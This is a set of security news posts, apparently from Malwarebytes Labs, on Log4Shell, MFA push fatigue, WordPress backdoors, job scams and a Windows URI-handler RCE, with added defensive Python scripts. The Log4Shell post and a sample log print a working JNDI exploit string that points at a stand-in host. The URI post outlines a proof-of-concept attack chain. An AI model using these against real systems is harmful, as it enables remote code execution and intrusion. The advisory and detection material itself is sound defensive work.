IT NEWS

Log4j zero-day “Log4Shell” arrives just in time to ruin your weekend

If you’re running a service that relies on Apache Struts or uses the popular Apache Log4j utility, we hope you haven’t made plans for the weekend.

An exploit listed as CVE-2021-44228 was made public on December 9, 2021. The exploit is simple, easy to trigger, and can be used to perform remote code execution (RCE) in vulnerable systems, which could allow an attacker to gain full control of them. All an attacker has to do is get the affected app to log a special string. For that reason, researchers have dubbed the vulnerability “Log4Shell”.

The vulnerability has a CVSS score of 10.0 out of a possible 10. It impacts Apache Log4j versions 2.0-beta9 to 2.14.1. Mitigations are available for version 2.10 and higher.

Log4j is an open source logging library written in Java that was developed by the Apache Software Foundation. Millions of applications use it, and some of them are enormously popular—such as iCloud, Steam, and Minecraft—so the potential reach of this problem is enormous.

Used in the wild

After the 0-day was posted on Twitter, along with a proof-of-concept that was published on GitHub, the exploit has already been spotted being used in the wild by CERT New Zealand, CERT Austria, and CERT Germany. Along with many others, they are seeing automated systems trying to exploit the vulnerability.

The vulnerability is triggered by a simple string sent to a vulnerable server:

${jndi:ldap://example.com/a}

When the vulnerable application logs the string it triggers a lookup to an attacker-controlled remote LDAP server (example.com in our scenario). The response from the malicious server contains a path to a remote Java class file that’s injected into the server process. Attackers can execute commands with the same level of privilege as the application that uses the logging library.

Given how common this library is and how serious the consequences of a relatively easy-to-exploit vulnerability can be, this is a recipe for disaster. Many organizations will not even realize they are vulnerable.

According to researcher Marcus Hutchins, in the case of Minecraft, attackers were able to get remote code execution on Minecraft servers by simply pasting the malicious string into the chat box. Similar examples exist for a number of other popular services.

Mitigation

Mitigations are available for versions of log4j 2.10.0 and up. Version 2.15.0 is not vulnerable by default. Note that there may be other dependencies, such as your Java version, that need to be updated before you can upgrade. Fixing the vulnerability may not be straightforward, but it is urgent.

According to the Apache log4j project, if you are unable to upgrade, for whatever reason, you can mitigate this vulnerability in version 2.10.0 or higher by switching log4j2.formatMsgNoLookups to true. This can be done by adding -Dlog4j2.formatMsgNoLookups=True to the JVM command for starting the application.
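As an added example, not code from the article or from the Apache Log4j project, the following Python script turns the version range and the mitigation flag described above into a triage check, and scans log lines for the literal ${jndi:...} lookup form shown earlier. The version boundaries are the ones the article states; the sample access-log lines and the application command line are constructed for the example, and the flag check only verifies that the property is present, not that the running JVM honours it.

```python
"""Added triage helpers for CVE-2021-44228 (Log4Shell); not from the article."""
import re

# Version boundaries as stated in the article.
AFFECTED_LOW = "2.0-beta9"   # first affected release
AFFECTED_HIGH = "2.14.1"     # last affected release
MITIGATION_MIN = "2.10.0"    # log4j2.formatMsgNoLookups is honoured from here
FIXED = "2.15.0"             # not vulnerable by default

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", re.IGNORECASE)
_TAG_RANK = {"beta": 0, "rc": 1}   # pre-release tags sort below a final release


def version_key(version):
    """Turn a Log4j version string into a tuple that sorts chronologically."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {version!r}")
    major, minor, patch, tag, num = m.groups()
    return (int(major), int(minor), int(patch or 0),
            0 if tag else 1,                      # pre-release before final
            _TAG_RANK[tag.lower()] if tag else 0,
            int(num or 0))


def classify_version(version):
    """One of: not-in-range, vulnerable-upgrade-only, vulnerable-mitigable, fixed."""
    k = version_key(version)
    if k[0] != 2 or k < version_key(AFFECTED_LOW):
        return "not-in-range"
    if k >= version_key(FIXED):
        return "fixed"
    if k > version_key(AFFECTED_HIGH):
        return "not-in-range"        # no release exists here, but stay explicit
    if k >= version_key(MITIGATION_MIN):
        return "vulnerable-mitigable"
    return "vulnerable-upgrade-only"


_FLAG_RE = re.compile(r"-Dlog4j2\.formatMsgNoLookups=(\S+)")


def has_nolookups_flag(cmdline):
    """True if the JVM command line sets the mitigation property to true.
    Java's Boolean parsing is case-insensitive, so 'True' also counts."""
    m = _FLAG_RE.search(cmdline)
    return bool(m) and m.group(1).lower() == "true"


def assess(version, cmdline=""):
    """Combine the version verdict with the runtime flag check."""
    status = classify_version(version)
    if status == "vulnerable-mitigable" and has_nolookups_flag(cmdline):
        return "mitigated-by-flag"
    return status


# Literal lookup form from the article; ldaps, rmi and dns are the other URL
# schemes a JNDI lookup accepts, so they are matched too.
_JNDI_RE = re.compile(r"\$\{jndi:(ldaps?|rmi|dns)://[^}]*\}", re.IGNORECASE)


def find_jndi_lookups(lines):
    """Return (line_number, matched_text) for every literal ${jndi:...} lookup."""
    return [(n, m.group(0))
            for n, line in enumerate(lines, 1)
            for m in _JNDI_RE.finditer(line)]


# Constructed access-log lines for the demonstration (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.com/a}"',
    '198.51.100.4 - - [10/Dec/2021:03:14:11 +0000] "GET /?q=${jndi:ldap://example.com/a} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for v in ["2.0-beta9", "2.9.1", "2.14.1", "2.15.0", "1.2.17"]:
        print(f"{v:10} {classify_version(v)}")
    print(assess("2.14.1", "java -Dlog4j2.formatMsgNoLookups=true -jar app.jar"))
    for n, hit in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {n}: {hit}")
```

Run it over your own dependency inventory and the command lines of running JVMs: anything that comes back vulnerable-upgrade-only has no flag-based mitigation and needs the upgrade, and a log hit shows which hosts were already being probed.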

Sadly, there is little, if anything, that users of affected systems can do to make themselves less vulnerable to the consequences. No doubt many systems will be affected and system administrators will want to treat anomalies with extreme caution.

So, if you’re an administrator looking forward to a quiet weekend, you know what to do!

Stay safe, everyone!

The post Log4j zero-day “Log4Shell” arrives just in time to ruin your weekend appeared first on Malwarebytes Labs.

Click “OK” to defeat MFA

Researchers have discovered that Nobelium—the threat actor behind the infamous SolarWinds supply-chain attack, the Sunburst backdoor, TEARDROP malware, GoldMax malware, and other malicious activities—has found a way to use stolen credentials even when they require multi-factor authentication that relies on smartphone push notifications.

And the technique used by this highly sophisticated threat actor? Nag users until they get bored.

Stealing credentials

In a report by Mandiant that describes several attack stages and scenarios by this group, one that jumped out at me involved the threat actor compromising service providers, and then using the privileged access and credentials belonging to these providers, to compromise downstream customers.

Attackers used the stolen credentials in a login page, which triggered a push notification to a device belonging to the credentials’ rightful owner. In theory the attacks should have been stopped there, because one of the two factors required for authentication—the push notification—needed the victim’s consent. In practice, that didn’t always work.

Nobelium used several tactics to get hold of valid credentials:

  • CRYPTBOT, an info-stealing malware.
  • Spear phishing campaigns.
  • Password guessing or password spraying.
  • Backdoors like FoggyWeb.

But often, having these credentials was not enough to gain access to the sensitive information the group was after. Most of the important services and assets required multi-factor authentication (MFA).

A brief introduction to MFA

Multi-factor authentication requires at least two different forms of authentication, from at least two out of three fairly broad categories:

  • The “something you know” category is the factor we are most familiar with. It requires a person to enter information that they know in order to gain access to their account. Passwords and PIN codes are the most common examples, but things like security questions used by your bank also fall into this category.
  • The “something you have” factor leans on something you have access to. That might be a separate email account or phone to which a verification code can be sent, but it can also be specialized hardware like a YubiKey.
  • The “something you are” category centers on certain physical markers (biometrics) that can be analyzed by technology to prove your identity. The most common examples are fingerprints and face recognition.

The most common forms of multi-factor authentication rely on a password (something you know) and a PIN code or push notification sent to your phone (something you have).

Push notifications as a second factor

Many MFA providers use a second factor that sends a push notification or phone call to a user’s phone just after they’ve entered a password. Users are expected to press a key on a phone app to approve the login. (These fall into the “something you have” category, because you need physical access to the phone to approve the login.)

If a user receives a push notification out of the blue, at a time when they aren’t trying to log in, that means somebody else is trying to use their password. If that happens they obviously aren’t supposed to approve the login.

Mandiant’s research reveals that a threat actor found a way around this form of authentication by simply issuing repeated MFA requests until the user became so bored, confused or frustrated they accepted.

Perhaps this shouldn’t be a surprise. In circumstances where users are busy, pressed for time, or simply tired of dialog boxes or notifications, many have the gut reaction to do whatever it takes to stop the nuisance that is distracting them. If all they have to do is hit “OK” on a prompt (a prompt they have seen lots of times before when it was perfectly safe to hit “OK”), many may not even think twice. Or if they do, it will be too late.
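The repeated-prompt pattern described above is visible in an identity provider’s MFA logs before anyone taps “OK”. As an added example, not code from the article, Mandiant, or any MFA vendor, the Python below flags users who receive several unapproved push prompts within a short window, and flags separately the case the article warns about: an approval that follows such a flood. The log line format and the events are constructed for the example; real IdP exports differ and the parser would need adjusting.

```python
"""Added example: spotting MFA prompt floods in an identity-provider log."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format for the example; real IdP logs differ.
_EVENT_RE = re.compile(r"^(\S+) user=(\S+) method=push result=(approved|denied|timeout)$")


def parse_event(line):
    m = _EVENT_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable MFA event: {line!r}")
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
    return ts, m.group(2), m.group(3)


def find_push_floods(lines, threshold=3, window=timedelta(minutes=10)):
    """Return (user, kind, timestamp) alerts.

    'prompt-flood': the user received `threshold` pushes inside `window` without
    approving any, which is what repeated attacker login attempts look like.
    'approved-after-flood': an approval came after such a flood inside the window,
    the outcome the article describes; treat it as a likely compromise, not a login.
    """
    events = sorted(parse_event(line) for line in lines)
    recent = defaultdict(deque)        # user -> timestamps of unapproved prompts
    alerts = []
    for ts, user, result in events:
        pending = recent[user]
        while pending and ts - pending[0] > window:
            pending.popleft()          # forget prompts older than the window
        if result == "approved":
            if len(pending) >= threshold:
                alerts.append((user, "approved-after-flood", ts))
            pending.clear()
        else:
            pending.append(ts)
            if len(pending) == threshold:
                alerts.append((user, "prompt-flood", ts))
    return alerts


# Constructed events: alice is being bombarded and finally taps approve;
# bob logs in normally; carol's three denials are hours apart (ordinary misfires).
SAMPLE_EVENTS = [
    "2021-12-10T08:00:01Z user=alice method=push result=denied",
    "2021-12-10T08:00:40Z user=alice method=push result=timeout",
    "2021-12-10T08:01:15Z user=alice method=push result=denied",
    "2021-12-10T08:01:50Z user=alice method=push result=denied",
    "2021-12-10T08:02:30Z user=alice method=push result=approved",
    "2021-12-10T08:05:00Z user=bob method=push result=approved",
    "2021-12-10T05:00:00Z user=carol method=push result=denied",
    "2021-12-10T06:30:00Z user=carol method=push result=denied",
    "2021-12-10T07:45:00Z user=carol method=push result=denied",
]

if __name__ == "__main__":
    for user, kind, ts in find_push_floods(SAMPLE_EVENTS):
        print(f"{ts:%H:%M:%S} {user:6} {kind}")
```

The threshold and window are deliberately low so the detection fires while the prompts are still arriving; an approved-after-flood alert is the one that should page someone, because at that point the password is already known to the attacker and the session is theirs until it is revoked.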

Push vs SMS

Push notifications are often seen as an improvement over a more widely used but less secure form of MFA that relies on SMS messages. Instead of hitting “OK” on a push notification, users enter a code—sent by SMS to their phone—alongside their username and password.

This attack shows that logic might not be right, at least not for everyone. Because push notifications are triggered automatically they could potentially be used in a “spray and pray” type of attack, where the threat actor tries to break into many different accounts at the same time, hoping that lots of people will absent-mindedly hit OK.

By contrast, attackers who want to compromise SMS-based MFA have to find a way to intercept the code being sent to the victim. Attackers often do this by persuading the victim’s cellphone carrier that they own the number and want to move it to a different phone, which puts the attacker in possession of the victim’s “something you have”. Although this is highly effective, and serious enough that it’s causing people to move away from SMS-based MFA, it is very difficult to compromise lots of different phone numbers with this kind of “SIM swap” attack at the same time. So while it is very effective in targeted attacks, SIM swapping is completely unsuitable for large-scale attacks.

It’s also worth noting that the reflex to click “OK” to stop the annoying prompts does not work for SMS.

SMS authentication can potentially be exploited on a large scale by phishing though. If attackers can lure victims to a fake login page they can capture their usernames, passwords, and 2FA codes and then forward them to the real login page. Obviously, due to the normally very limited lifespan of the code, the attacker will have to be fast.

Mitigation

Both SMS and push notification-based MFA are improvements over no MFA at all, but both have their flaws. As an organization you should consider using a more restrictive type of MFA, at least for important assets.

Hardware keys are a much more robust second factor. They may be more expensive, but imagine the cost of a major breach they could save you from.  

Until you start using hardware keys, we hope that if you receive an unexpected prompt you will alert your security team, rather than try to get rid of it as fast as you can.

Stay safe, everyone!

The post Click “OK” to defeat MFA appeared first on Malwarebytes Labs.

What is a search engine and why does anyone care which one you use?

An attempt at a simple definition: a search engine is a software system that allows users to find content on the Internet based on their input.

The introduction of the major search engines brought about huge changes in the way we use the Internet. There is a wealth of knowledge available for those that know where to look. One search engine has become such an important factor of our online life that to google has become an accepted verb. It was even elected the “most useful word of 2002” by the American Dialect Society. At the time of writing over 90% of the search engine market has been acquired by Google.

Search queries

The days when the input for a search engine was limited to text queries are long gone. Most major search engines also let you perform a reverse image search, which finds images similar to the one you are querying with.

The most popular search queries of a year can tell historians of the future what we cared most about at the time. The top 3 for 2020 were:

  1. Election results
  2. Coronavirus
  3. Kobe Bryant

Search engine optimization

The fact that companies want to be found by search engines has led to a set of marketing techniques aimed at raising the popularity of a website. The goal is to have your site high up in the search results when a user searches for certain keywords that are relevant for your business. The name for these techniques is search engine optimization (SEO). The ranking of a site in Google’s search results is primarily based on how well the page is optimized, but it’s also based on “reputation.” The reputation of a page is calculated, among others, by using the number of inbound links pointing to that page. It helps a lot if the incoming links come from pages that are about the same or related subjects, but a large amount of links coming from all kinds of sites helps as well.

Default search engine

Sometimes you will see prompts that the default search engine of your browser was changed, or you will be asked to change the default search engine.

[Image: Chrome warning that the default search engine was changed]

In the example displayed above, Chrome is warning the user about a search hijacker that has taken control of the user’s default search engine. You may also see a browser asking you to change back to the default search engine it came with, or even websites asking you to change your default search engine.

How do search engines make money?

Although there are different ways in which search engines make money, the majority comes from asking for money from companies that want to show up in search results in a noticeable way.

  • Organizations can buy advertisements that get displayed above the actual search results.
  • Organizations can pay to get their logo and core information displayed along the search results leading to their websites.
  • Organizations can pay for marketing data based on consumer’s habits.
  • Search engines can sell their search results to others so they can create directories, verticals, or catalogs.
  • Search engines can sell clicks on links in the search results.

These activities are so profitable that some potentially unwanted programs and adware make money for their creators by acting as search hijackers.

How do search engines work?

Where do search engines find the results that fit the query, and how do they do it so fast? Most search engines are crawlers. A crawler search engine generates its results by automatically compiling web pages and sites. Websites that cannot be crawled are part of the Deep Web. The Deep Web is what we call the unindexed part of the Web, which is any site that a search engine can’t find. A part of the Deep Web that you may have heard of is the Dark Web. The Dark Web is intentionally hidden, anonymous, and widely known for illicit activities.

Or as this meme explains it with a wink at those struggling for good SEO results:

[Image: meme about the surface web, Deep Web and Dark Web]

Besides crawlers, there are directories and verticals, which are different kinds of user-generated collections of search results and sites. If the selected results are paid for, we call these sponsored search engines.

The speed with which the major search engines come up with search results is due to data centers around the world. While you’re typing your search query, the search engine predicts the rest of your query, combs through billions of web pages, ranks the sites, images, videos, and products it finds, and presents you with the very best results. And it does all that usually in less than a tenth of a second. To us mere humans that is practically instant. From wherever in the world you perform a Google search, the results are most likely served to you from nearby computers.

What is the most private search engine?

There are several search engines that help you maintain your anonymity online while searching for answers to your queries. Of those, DuckDuckGo and Brave are the most well-known ones. Both are crawlers and can deliver speedy results, without tracking user searches, building user profiles, or requiring the use of an external, pre-existing search index to deliver results.

And for those that are looking for a search engine that is both privacy and environmentally friendly, you can have a look at Ecosia.

Choosing a search engine

You can find and change the default search engine in your browser settings. Where exactly depends on your browser, but in the browsers I checked it is one of the main items in the “Settings” menu.

Which one should you use? Whatever suits your needs best. We always like our readers to make up their own mind while we try to provide them with the information to base their decision on.

Happy searching and stay safe, everyone!

The post What is a search engine and why does anyone care which one you use? appeared first on Malwarebytes Labs.

Has your WordPress site been backdoored by a skimmer?

Skimmers and other threat actors are backdooring websites, and WordPress instances in particular, according to a recently released report.

Researchers at Sucuri say attackers have developed methods to make sure that their grip on the infected site is not easily removed by applying the next update. They create a backdoor for themselves so they can easily take back control and insert their own code.

WordPress as a target

WordPress, the most popular web content management system (CMS), has seen its fair share of plugins that leave online shoppers vulnerable.

One common mistake website owners often make is to leave their CMS unpatched thinking they are not an interesting target. In many cases, users may choose not to apply security updates for fear of introducing bugs or even stop a website from loading properly. This behavior creates the perfect opportunity for online criminals to exploit known vulnerabilities on a large scale.

However, the research by Sucuri shows that even site owners that patch promptly are not safe from certain threat actors.

Creating a backdoor

To make sure they can stay inside the site once they’re in, the threat actors create a backdoor that either re-inserts the malicious code or allows the threat actor access to do it manually. Attackers have developed different methods for protecting their work.

In most cases of this type of infection, we will find a modified index.php, which in some cases automatically regenerates itself through a malicious process running in the background. The persistent, running processes on the server are what allow the malware to automatically and immediately reinfect the site once the infection is removed. Even on non-WordPress sites, the attackers will replace index.php with an infected copy of the WordPress index.php file.

In other cases, the researchers found hundreds or sometimes thousands of infected .htaccess files scattered throughout the website directories. These are designed to prevent custom PHP files or tools from running on the site in case there’s mitigation already in place.

In other cases you may find a modified wp-includes/plugin.php file designed to re-create the index.php and .htaccess. But even though plugin.php is a common point of attack, similar code has been found in other core files.

Identifying and cleaning the problem

Malicious code on your website can be planted there for various reasons, such as for card skimming or spreading malware. To keep an eye on your site, the following areas are important:

  • File integrity. Make sure that your core files can’t be changed without you being aware of the changes. One option to do this is file integrity monitoring through active server-side scanners.
  • Logging. All important changes on your site should be visible in logs. New plugins, updates of the CMS and plugins, and file changes should be monitored. If you do not recognize them as something you implemented, then investigate them.
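As an added example, not code from the article or from Sucuri, the Python below is a minimal stand-in for the server-side integrity scanner the first bullet recommends. It hashes every file under a web root, compares a later snapshot against that baseline, and reports the patterns the article describes: a modified index.php or wp-includes/plugin.php, and newly appeared .htaccess files. The web root it builds and tampers with is constructed inside a temporary directory so the example runs anywhere.

```python
"""Added example: a minimal file-integrity check for a web root."""
import hashlib
import tempfile
from pathlib import Path

# Core files the article names as backdoor targets.
WATCHED_CORE = {"index.php", "wp-includes/plugin.php"}


def hash_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map every file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hash_file(p)
            for p in root.rglob("*") if p.is_file()}


def diff_snapshots(baseline, current):
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
    }


def triage(changes):
    """Turn raw diffs into findings matching the patterns the article describes."""
    findings = []
    for p in changes["modified"]:
        if p in WATCHED_CORE:
            findings.append(f"core file modified: {p}")
    for p in changes["removed"]:
        if p in WATCHED_CORE:
            findings.append(f"core file removed: {p}")
    for p in changes["added"]:
        if Path(p).name == ".htaccess":
            findings.append(f"new .htaccess: {p}")
    return findings


def demo():
    """Build a constructed web root, baseline it, tamper with it, return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        files = {   # constructed stand-ins, not real WordPress files
            "index.php": "<?php require __DIR__ . '/wp-blog-header.php';\n",
            "wp-includes/plugin.php": "<?php // plugin API\n",
            "wp-content/uploads/photo.jpg": "binary placeholder\n",
        }
        for rel, text in files.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(text)
        baseline = snapshot(root)
        # Simulated tampering: an edited index.php and a dropped .htaccess.
        (root / "index.php").write_text(
            "<?php /* constructed marker */ require __DIR__ . '/wp-blog-header.php';\n")
        (root / "wp-content/uploads/.htaccess").write_text(
            "# constructed: injected directive\n")
        changes = diff_snapshots(baseline, snapshot(root))
        return changes, triage(changes)


if __name__ == "__main__":
    changes, findings = demo()
    print(changes)
    for f in findings:
        print("!", f)
```

Two points matter in practice: keep the baseline off the web server (an attacker with write access to the site can rewrite a baseline stored beside it), and compare core-file hashes against a clean copy of the same CMS release rather than only against your own earlier snapshot, so an infection that predates the baseline is still caught.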

This Sucuri blog has elaborate instructions on how to remove these infections, should you find your site has fallen victim to these threat actors.

Protecting your site

For website owners there are some guidelines to stay safe from these practices.

  • Put your website behind a firewall. Or take other measures that restrict access to the wp-admin area to only specific IP addresses.
  • Regularly change all admin passwords associated with your site. This includes the admin dashboard, CPanel/FTP, ssh and email. Where possible enable MFA.
  • Keep all plugins, themes and your CMS up to date at all times and remove any unneeded plugins or themes. Speed is important. Attackers are always aware of the latest vulnerabilities and will scan the Internet for unpatched sites to hijack, sometimes within hours of a patch being made available.

You can read more in our article: How to defend your website against card skimmers.

For visitors of shopping sites, take as many precautions as possible. There are browsers and browser configurations that will help you against falling victim to skimmers, malicious redirects, and other unwelcome code on a site you are visiting.

Stay safe, everyone!

The post Has your WordPress site been backdoored by a skimmer? appeared first on Malwarebytes Labs.

Fake job interviews plague major game developers like Riot Games and Rockstar

If you’re job hunting at the moment, be on your guard. The pandemic is still around. Lots of people are in need of employment. Scammers are all too happy to string folks along with bogus employment offers, as is the case here.

How have they managed to snare prospective job hunters?

Riding on the coat-tails of giants

Nefarious individuals have been stringing would-be employees along using fake interviews. The fraudsters claim to be well known video game developers. Unfortunately, there are folks out there who’ve already lost out financially. It’s likely that they won’t be getting their money back.

These fakers claiming to be HR reps from the impacted organisations weren’t shy about who they impersonated. Rockstar Games (Grand Theft Auto), Manticore Games (Core) and others were spoofed. Riot Games, developer of League of Legends, have taken legal action over the bogus job offers.

The lawsuit sues “unnamed” individuals for infringement and fraud. According to Polygon, Riot is using the lawsuit to find out more about the scammers before taking further action.

How did the scam work?

Like many bogus job offers, it’s a combination of contacting potential victims or having them respond to fake job postings. Riot mentions that some of its employees are being impersonated to make it all seem more convincing. It’s a safe bet the scammers have harvested some names from social media, such as LinkedIn listings.

Fake interviews would then be conducted on whichever platform the victims had made initial contact through. Discord is mentioned, and we’d be surprised if apps like WhatsApp weren’t also in use. These are patterns that regular readers will be familiar with, such as holding fake interviews on Telegram in Bitcoin scams.

Show me the money

As with the above linked scams, eventually the fakers will ask for money upfront. This is to purchase “work equipment”, which they claim will be refunded to the victim afterwards. Of course, this doesn’t happen and the victim is out of pocket while the fraudsters vanish with the cash. While alarm bells may ring for many when asked for money upfront, it’s not so easy for younger applicants. A combination of inexperience, a convincing scam, and uncertainty about business practices during pandemic times means this has a decent chance of succeeding.

Indeed, Riot Games note one victim has already been in touch claiming to have lost money. At this point, we don’t know if the money was wired or sent in the form of digital currency. What we can say for sure is that bogus job offers won’t disappear over the holiday season.

The perils of job hunting online

Unfortunately it’s a tough thing to land a job online. Placing personal data onto resume/job hunt sites can go wrong if the data is scraped or leaked. Many sites will ask you to be as thorough as possible, but this means home addresses, phone numbers, and dates of birth all over the place. Once it’s swiped, it’s swiped. You need to carefully assess how much you’re willing to reveal to the world at large in a worst case scenario and act on it appropriately.

Social media makes it easy for anyone to talk to you, but this also means scammers have the same ability. When your data is mined, you end up gravitating towards people with the same likes and interests. This gently nudges many similar fish into one huge digital barrel, and scammers can pick and choose targets at their leisure. We’re not saying people don’t receive genuine job inquiries on social media, but it definitely pays to be careful. Even verified accounts can be compromised, so you can never be 100% sure if that offer is legit.

Time to verify 

For something as important as a job offer or interview, we’d suggest asking to speak to a second person at the organisation in question from a valid company email address at the very least. If you’re still not sure, you could always ask a second person from that org on social media if what you’re being sent is the real deal.

If you’d like some more general tips for avoiding fake job offers online, rest assured we’ve got you covered.

You don’t want to be out of pocket at the end of the year thanks to a scammer, so if you’re hunting for a job at the moment we wish you the very best of luck.

The post Fake job interviews plague major game developers like Riot Games and Rockstar appeared first on Malwarebytes Labs.

Vulnerability in Windows 10 URI handler leads to remote code execution

Researchers at Positive Security have discovered a drive-by remote code-execution (RCE) bug in Windows 10. The vulnerability can be triggered by an argument injection in the Windows 10 default handler for ms-officecmd: URIs. It is likely that this vulnerability also exists in Windows 11.

What’s worrying is that the research team simply decided to find a code execution vulnerability in a default Windows 10 URI handler, and that they succeeded within two weeks. Given how many URI handlers are included in Windows you can bet that there are others to be found.

What is a URI handler?

A Uniform Resource Identifier (URI) is a unique sequence of characters that identifies a logical or physical resource used by web technologies. The well-known uniform resource locator (URL) and the uniform resource name (URN) are both examples of URIs. A URI handler is the program that gets launched to open a URI of a certain type. For example, the URI handler for ftp links can be different from the URI handler that deals with http links. This depends on your settings and often on which software and apps you have installed.

The problem handler

In this case the code execution is triggered by a malicious website which performs a JavaScript redirect to a crafted ms-officecmd: URI (a scheme used by the Microsoft Office Universal Windows Platform (UWP) app to launch other Office desktop applications).

As an alternative to exploitation through malicious websites, crafted ms-officecmd: URIs could also be delivered via desktop applications performing unsafe URL handling. However, this exploit only works if the user has Microsoft Teams installed but it is not running.

ms-officecmd

While looking for viable candidates, the ms-officecmd: scheme immediately grabbed the attention of the research team due to its promising name. MS Office is a very complex suite of applications with many legacy features and a long history of exploitability. On top of that, the scheme ends in the abbreviation for ‘command’, which suggests even more complexity and potential for injection.

[Image: ms-officecmd in the registry]
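Knowing which URI schemes a browser can hand off to a local program is the first step to assessing this class of bug. As an added example, not from the article or from Positive Security, the Python below parses the text of a registry export (the output of reg export HKEY_CLASSES_ROOT, which registers URI schemes under keys carrying a “URL Protocol” value) and lists each scheme together with the command its handler runs. The .reg fragment here is constructed and the executable paths in it are placeholders, not the real locations of LocalBridge.exe or any mail client; a real export is UTF-16 with a byte-order mark, so read it with encoding="utf-16" before passing the text in.

```python
"""Added example: list URI-scheme handlers from a .reg export of HKEY_CLASSES_ROOT."""
import re

# Constructed fragment in .reg export syntax. Paths are PLACEHOLDERS.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\ms-officecmd]
@="URL:ms-officecmd"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\ms-officecmd\shell\open\command]
@="\"C:\\PLACEHOLDER\\LocalBridge.exe\" \"%1\""

[HKEY_CLASSES_ROOT\mailto]
@="URL:MailTo Protocol"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\mailto\shell\open\command]
@="\"C:\\PLACEHOLDER\\MailClient.exe\" \"%1\""

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"
'''

_KEY_RE = re.compile(r"^\[HKEY_CLASSES_ROOT\\([^\]]+)\]$")
_COMMAND_SUFFIX = "\\shell\\open\\command"


def _unescape(s):
    """Undo .reg string escaping: a backslash escapes the next character."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_url_handlers(reg_text):
    """Return {scheme: command or None} for every key marked 'URL Protocol'."""
    schemes, commands = set(), {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1)
            continue
        if current is None or not line:
            continue
        if line.startswith('"URL Protocol"='):
            schemes.add(current.lower())
        elif (line.startswith('@="') and line.endswith('"')
              and current.lower().endswith(_COMMAND_SUFFIX)):
            scheme = current[: -len(_COMMAND_SUFFIX)].lower()
            commands[scheme] = _unescape(line[3:-1])
    return {s: commands.get(s) for s in sorted(schemes)}


def handlers_passing_uri(handlers):
    """Schemes whose command receives the full URI (%1) as a process argument,
    i.e. the ones where argument handling deserves a closer look."""
    return sorted(s for s, cmd in handlers.items() if cmd and "%1" in cmd)


if __name__ == "__main__":
    found = parse_url_handlers(SAMPLE_REG)
    for scheme, cmd in found.items():
        print(f"{scheme:14} -> {cmd}")
    print("pass %1 to a process:", handlers_passing_uri(found))
```

On a real machine the list is long; the point of the inventory is to know which handlers an unexpected “Open ...?” prompt in the browser would launch, and to be able to answer, when a patch like the one discussed below lands, whether the handler it touches is even present.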

When the team started playing around with it, they noticed an executable called LocalBridge.exe which would briefly run, but would show no apparent external effect.

The research team decided to decompile LocalBridge.exe, which taught them how to create a valid JSON payload. It turned out they had to dig deeper. That meant analyzing AppBridge.dll next, since it contained the LaunchOfficeAppValidated method which the JSON payload is ultimately passed to.

As a different approach to dissecting the application that handles ms-officecmd: URIs, they tried inspecting an application which generates URIs that get handled by ms-officecmd:. They ended up at the Office UWP app. In this context it is good to know that the Office apps for phones using Windows 10 Mobile (Word, Excel, PowerPoint, OneNote) reached end of support on January 12, 2021. That means that since that date, app users no longer receive security updates, non-security hotfixes, free assisted support options or online technical content updates from Microsoft.

After some tinkering, the researchers managed to use the extracted JSON payload to open Office desktop applications via ms-officecmd: URIs. Specifically, the payload extracted from the Office UWP app could be used to open Outlook.

Phishing angle

The researchers found that when an http(s) URL was provided in the filename property, Outlook would render the respective webpage in an IE11 powered embedded web view. No indication of the webpage’s origin or even the fact that the displayed content stemmed from an external webpage was given. This behavior could be abused to mount very believable phishing attacks, especially since mailto: links are, depending on local configuration, expected to open the user’s email program.

Based on this information, the researchers crafted a PoC that does the following once a user can be tricked into clicking a link on a malicious website:

  • A malicious executable named outlook.exe is saved to the victim’s download folder by dynamically adding an iframe that points to the exe file.
  • The innocent looking mailto: link target is replaced with a malicious ms-officecmd: URI which references the downloaded executable in its filename property.
  • The user confirms the ‘Open LocalBridge?’ dialog, which is not an explicit security warning.
  • When Outlook is starting up, it displays a warning dialog about opening a potentially unsafe hyperlink. The user confirms opening the local ‘outlook.exe’ file since they are expecting Outlook to be opened.
  • The downloaded file is executed.

Patched or not?

The researchers have been going back and forth with Microsoft about this for months, having initially disclosed the weakness to Microsoft in March. Microsoft closed Positive Security’s initial report the very next day, based on what Positive Security called Microsoft’s “erroneous” belief that the exploit relies on social engineering, which would not meet the definition of a security vulnerability.

According to the researchers, the patch that was issued after five months seems to only affect Teams and Skype. The argument injection vulnerability described in this post is still present on fully patched Windows 10 and 11 systems. After the researchers brought this to Microsoft’s attention, they were told another patch addressing the argument injection was underway. Microsoft gave the researchers the go-ahead to post their write-up independently of its rollout.

